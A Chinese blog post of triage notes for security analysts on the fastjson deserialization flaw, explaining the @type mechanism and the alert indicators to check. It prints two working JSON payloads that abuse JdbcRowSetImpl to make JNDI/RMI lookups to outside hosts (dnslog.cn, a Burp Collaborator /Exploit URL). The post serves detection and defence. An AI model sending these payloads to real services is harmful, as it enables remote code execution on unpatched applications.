fastjson反序列化漏洞

最新推荐文章于 2024-05-20 12:05:24 发布
最新推荐文章于 2024-05-20 12:05:24 发布
阅读量462 收藏 9
点赞数 8
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207482/article/details/136238182
版权

 

fastjson漏洞利用原理

在请求包里面中发送恶意的json格式payload,漏洞在处理json对象的时候,没有对@type  字段进行过滤,从而导致攻击者可以传入恶意的TemplatesImpl类,而这个类有一个字段就是_bytecodes,有部分函数会根据这个_bytecodes生成java实例,这就达到fastjson通 过字段传入一个类,再通过这个类被生成时执行构造函数

 

 

初研判:

产生这个告警的时候着重查看原始事件里面的payload看是否有json格式的文件或者json的其他字段,或者看响应包里有无json格式或者fastjson,或者是否有_bytecodes 和dnslog关键字。

看是否会出现toJSONString() 和 parseObject() 方法关键字(这俩方法可以将 Java 对象与 JSON 相互转换)

告警示例图:

抓包登录界面添加了字符破环原始json数据发现为fastjson

d22f0cae8145430facc367f69c618a96.png

07424eaee82d43c2b302f3df27caad0e.png

fastjson反序列化相关payload

  {

    "a":{

    "@type":"java.lang.Class",

   "val":"com.sun.rowset.JdbcRowSetImpl"

   },

   "b":{

   "@type":"com.sun.rowset.JdbcRowSetImpl",

   "dataSourceName":"rmi://dnslog.cn/zcc",

   "autoCommit":true

   }

  }

 

  1. 驱动JdbcRowSetImpl库;
    2、通过设置dataSourceName属性传参给lookup()方法;
    3、通过设置autoCommit属性来触发执行最终的lookup()方法。
    按照上面的例子,就可以构造出:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://vvui5lzoq6556fmj4al3ighsrjxalz.burpcollaborator.net/Exploit","autoCommit":true}

着重查看标红关键字  rmi.class是Java的类文件,相较来说是恶意的

 

Lyx-0607
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
FastJson反序列化漏洞复现附带多个版本的payload
qq_41187177的博客
09-03 4168
FastJson<=1.2.68版本反序列化漏洞复现1.漏洞环境搭建2.攻击环境搭建3.攻击步骤4.各个Fastjson版本的payload3.漏洞解析 1.漏洞环境搭建 打开IDEA,新建一个java web的项目 修改HelloServlet.java文件输入一下代码import java.io.*; import javax.servlet.http.*; import javax.servlet.annotation.*; import com.alibaba.fastjson.*; @W
fastjson 系列漏洞
SHELLCODE_8BIT的博客
11-14 2367
jackson 和 fastjson 在序列化的候,先利用反射找到对象的所有 get 方法,接下来去 get,然后小写化,作为 json 的每个 key 值,而 get 方法的返回值作为 value。接下来再反射 field,添加到 json 中。
fastjson反序列化漏洞复现
最新发布
m0_70349048的博客
05-20 458
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化型,其次,Fastjson自定义的反序列化机制会调用指定中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据,攻击者可以构造数据,使目标应用的代码执行流程进入特定的特定setter或者getter方法中,若指定的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。更改GET型为POST。
Fastjson 1.2.22-24 反序列化漏洞分析
遇事不决冲冲冲
04-29 2326
FastJson在 1.2.22 - 1.2.24 版本中存在反序列化漏洞,主要原因FastJson支持的两个特性: fastjson反序列化,JSON字符串中的 @type 字段,用来表明指定反序列化的目标恶意对象fastjson反序列化,字符串会自动调用恶意对象的构造方法, setter 方法, getter 方法, 若这方法中存在利用点,即可完成漏洞利用。 主要存在两种利用方式: JdbcRowSetImpl(JNDI) TemplatesImpl(Feature.SupportNonP
代码审计-Fastjson各版本漏洞分析(上)
dzqxwzoe的博客
08-03 1646
最先出现问题的Fastjson 1.2.24反序列化漏洞已经分析过了,产生漏洞的原理也差不多理解了。
Fastjson反序列化漏洞
热门推荐
m0_67401761的博客
09-11 1万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同减轻大家的负担。
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此/tmp目录 ![img]...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
04-18 1799
Fastjson反序列化漏洞复现(实战案例)
fastjson反序列化的的问题
无名小辈
04-28 1187
fastjson反序列化的的问题 我们可以使用 JSON.parseObject() 将 JSON 字符串转换为 Java 对象。 注意反序列化为对象,必须要有默认无参的构造函数,否则会报异常: com.alibaba.fastjson.JSONException: default constructor not found. Person newPerson = JSO...
关于fastjson序列化不可见特殊字符存在的bug
一只蜗牛的博客
01-15 4776
相关博文链接:http://i.dotidea.cn/2014/08/fastjson-serialize-overflow/ 链接摘自某位大神,自己做个备忘 fastjson 1.1.39版本以下(包括1.1.39)在序列化json数据,如果被序列化的对象中存在某个属性(属性值含有不可见的特殊字符), 会转换失败,报java.lang.ArrayIndexOutOfBoundsExcep
fastjson反序列化攻略,网络安全开发者值得深入思考的几个问题
m0_60575487的博客
04-07 619
还有兄弟不知道网络安全面试可以提前刷题吗?费一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
FastJson反序列化
m0_73973498的博客
04-06 1195
Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。
fastJson漏洞之@type
weixin_45650737的博客
04-12 2822
public class User { private String name; public User() { System.out.println("com.hundsun.ifs.management.server.User()"); } public String getName() { System.out.println("getName"); return name; } public voi
fastjson 反序列化漏洞
08-24
fastjson 反序列化漏洞是指在使用 fastjson 库解析 JSON 字符串存在安全风险的问题。具体来说,fastjson 反序列化漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串,可能会触发不安全的反序列化操作,导致攻击者能够执行任意代码或进行其他恶意操作。 这种漏洞通常是由于 fastjson反序列化过程中缺乏足够的安全检查和过滤机制,导致恶意用户能够构造特定的 JSON 字符串来触发漏洞。攻击者可以通过在 JSON 字符串中插入恶意的 Java 代码或利用已知的 Java 反序列化漏洞执行任意代码。 为了防止 fastjson 反序列化漏洞的利用,建议遵循以下几点: 1. 尽量避免使用 fastjson 库,可以考虑使用其他更安全的 JSON 库。 2. 更新 fastjson 到最新版本,以获取最新的修复和安全增强功能。 3. 对用户输入的 JSON 字符串进行严格的验证和过滤,确保只有合法的、受信任的数据被反序列化。 4. 配置 fastjson 的 ParserConfig,限制反序列化操作只能处理预期的型。 5. 避免在反序列化过程中执行不可信的代码,尽量将反序列化操作限制在有限的安全环境中。 总之,fastjson 反序列化漏洞一个需要注意和防范的安全问题,开发者在使用 fastjson应当保持警惕并采取相应的安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lyx-0607

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值